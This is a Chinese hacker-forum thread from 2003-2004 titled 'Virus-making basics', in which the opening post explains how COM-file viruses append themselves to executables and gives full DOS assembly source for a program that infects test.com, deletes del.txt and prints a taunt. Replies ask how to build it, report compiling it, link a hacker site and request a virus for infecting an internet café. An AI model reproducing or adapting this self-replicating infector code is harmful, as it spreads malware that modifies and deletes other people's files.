标题:
[原创]病毒制作初步
[打印本页]
作者:
firewood
时间:
2003-3-2 01:18
标题:
[原创]病毒制作初步
病毒的编写是一种高深技术,真正的病毒一般都具有:传染性、隐藏性(又称潜伏性)、破坏性。现在的病毒种类也不少,如平常的传染可执行文件的病毒、宏病毒等等。但原始的、破坏性最大的病毒还是传染可执行文件的病毒(像CIH病毒),而这些病毒一般都是用汇编语言编写的。有许多人对病毒有着好奇和向往,但是往往又因为汇编语言的难学等问题望而却步。
这篇文章就是教给大家如何制作一个简单的程序,这个程序虽然算不上病毒但是具有病毒的传染性,而往往病毒的传染性是平常人最难做到的。
好啦,现在转入正题,先讲讲病毒是如何传染的,传染后又如何在被染的文件中执行的,其实道理非常简单:病毒一般将其代码写入执行文件的尾部,然后使执行文件在执行时先执行文件尾部的病毒代码,然后再跳回原代码处执行。现在举一个试例进行说明:
;-----------------------------------------
;功能:感染当前文件夹的test.com文件
; 并删除当前文件夹的del.txt文件
; 显示预设的字符串
CSEG SEGMENT
ASSUME CS:CSEG,DS:CSEG,SS:CSEG
main PROC NEAR
mainstart:
CALL vstart ;病毒的代码开始处
vstart:
POP SI ;得到当前地址
MOV BP,SI ;保存当前地址
PUSH SI
MOV AH,9
ADD SI,OFFSET message-OFFSET vstart ;显示预设字符串
MOV DX,SI
INT 21h
POP SI
ADD SI,OFFSET yuan4byte-OFFSET vstart ;取得原程序中的前四个字节
MOV DI,100h ;目的地址
MOV AX,DS:[SI] ;开始复制
MOV DS:[DI],AX
INC SI
INC SI
INC DI
INC DI
MOV AX,DS:[SI]
MOV DS:[DI],AX
MOV SI,BP ;恢复地址值
MOV DX,OFFSET delname-OFFSET vstart
ADD DX,SI
MOV AH,41h
INT 21h
MOV DX,OFFSET filename-OFFSET vstart ;得到文件名
ADD DX,SI
MOV AL,02
MOV AH,3dh ;写文件
INT 21h
JC error
MOV BX,AX ;文件句柄
MOV DX,OFFSET yuan4byte-OFFSET vstart ;读文件的前四个字节
ADD DX,SI
MOV CX,4
MOV AH,3fh
INT 21h
MOV AX,4202h ;到文件尾
XOR CX,CX
XOR DX,DX
INT 21h
MOV DI,OFFSET new4byte-OFFSET vstart ;保存要跳的地方
ADD DI,2
ADD DI,SI
SUB AX,4
MOV DS:[DI],AX
ADD SI,OFFSET mainstart-OFFSET vstart ;准备写入病毒
MOV DX,SI
MOV vsizes,OFFSET vends-OFFSET mainstart
MOV CX,vsizes
MOV AH,40h
INT 21h
MOV SI,BP ;定位到文件头
MOV AL,0
XOR CX,CX
XOR DX,DX
MOV AH,42h
INT 21h
MOV AH,40h ;将新的文件头写入
MOV CX,4
MOV DX,OFFSET new4byte-OFFSET vstart
ADD DX,SI
INT 21h
MOV AH,3eh ;关闭文件
INT 21h
error:
MOV AX,100h
PUSH AX
RET
main ENDP
yuan4byte:
RET
DB 3 DUP (?)
vsizes DW 0
new4byte DB ‘M‘,0e9h,0,0
filename DB "test.com",0
delname DB "del.txt",0
message DB "He he he he!"
DB 0dh,0ah,"$"
vends:
start:
MOV AX,CSEG
MOV DS,AX
MOV SS,AX
CALL main
MOV AX,4c00h
INT 21h
CSEG ENDS
END start
以上就是一个简单的可以传染COM文件的程序代码, 也是想当初我所做的具有传染性质的第一个程序。如何???不难吧。
附:
COM文件执行时将COM文件内所的所有内容COPY到内存, 起始地址是100,然后进行执行
没有任何有关节啦、段啦这些属性,所以COM文件病毒是最简单最简单的病毒。
作者:
huyifei
时间:
2003-4-25 21:29
标题:
[原创]病毒制作初步
他用什么写?
用什么格式保存
作者:
疾速邪狼
时间:
2003-4-28 21:51
标题:
[原创]病毒制作初步
用什么东西写啊?详细点介绍哦
作者:
天堂友人
时间:
2003-4-30 10:12
标题:
[原创]病毒制作初步
这个是汇编程序的代码,看来楼主是汇编高手
这种操作一般都在dos下才可以吧,楼主给我们菜鸟再介绍详细一点吧
作者:
zhaghot
时间:
2003-5-4 14:11
标题:
[原创]病毒制作初步
是的呀?说清楚一点对我来说太深渊了
作者:
cthily
时间:
2003-5-19 22:39
标题:
[原创]病毒制作初步
具体的可以到这里去看了,很详细的了,
http://www.cnhonker.net/Files/
还有很多的其它好东西哟。
作者:
freejanker
时间:
2003-5-20 18:43
标题:
[原创]病毒制作初步
我用汇编编译成功了,有一处警告。
我用的是2000系统,如果运行了这个病毒程序,怎样清除掉?
作者:
cndijkstra
时间:
2003-6-4 16:22
标题:
[原创]病毒制作初步
哦,是的哦,
果然是各有千秋,
不过,我比较懒,在这里看文章也一样的哦。
作者:
黑海一滴
时间:
2003-6-5 14:42
标题:
[原创]病毒制作初步
test.com是什么东西呀
还有以.com为后缀的文件是什么类型的文件呀
能回答一下吗
谢谢
作者:
黑海一滴
时间:
2003-6-5 21:31
标题:
[原创]病毒制作初步
OFFSET new4byte-OFFSET vstart
OFFSET mainstart-OFFSET vstart等一系列的命令是怎样的??
能不能给出一个例子?
作者:
痞子狂
时间:
2003-6-6 18:08
标题:
[原创]病毒制作初步
这是用啊个编的啊
看不懂
用C语言能吗???????
作者:
ley6570
时间:
2003-6-26 10:14
标题:
[原创]病毒制作初步
此贴快哉
但是有一缺点:
毒性不大
金山就杀了
!!!!!!!!!!!!!!!!!!!!!
作者:
ley6570
时间:
2003-6-26 10:15
标题:
[原创]病毒制作初步
fwef
作者:
liyu198202
时间:
2003-6-26 13:25
标题:
[原创]病毒制作初步
你到网上找撒
作者:
x-hacker
时间:
2004-4-4 01:15
标题:
[原创]病毒制作初步
下面引用由
天外飞狐
在
2003/06/25 02:11pm
发表的内容:
谁能找一个传染一个网吧的病毒啊?
作者:
羽泽
时间:
2004-7-3 17:01
标题:
[原创]病毒制作初步
用C也可以啊!!
C语言是一种跨平台的计算机语言啊~~~
不过好像没有用汇编语言编的璇噎!!!
欢迎光临 黑色海岸线论坛 (http://bbs.thysea.com/)
Powered by Discuz! 7.2
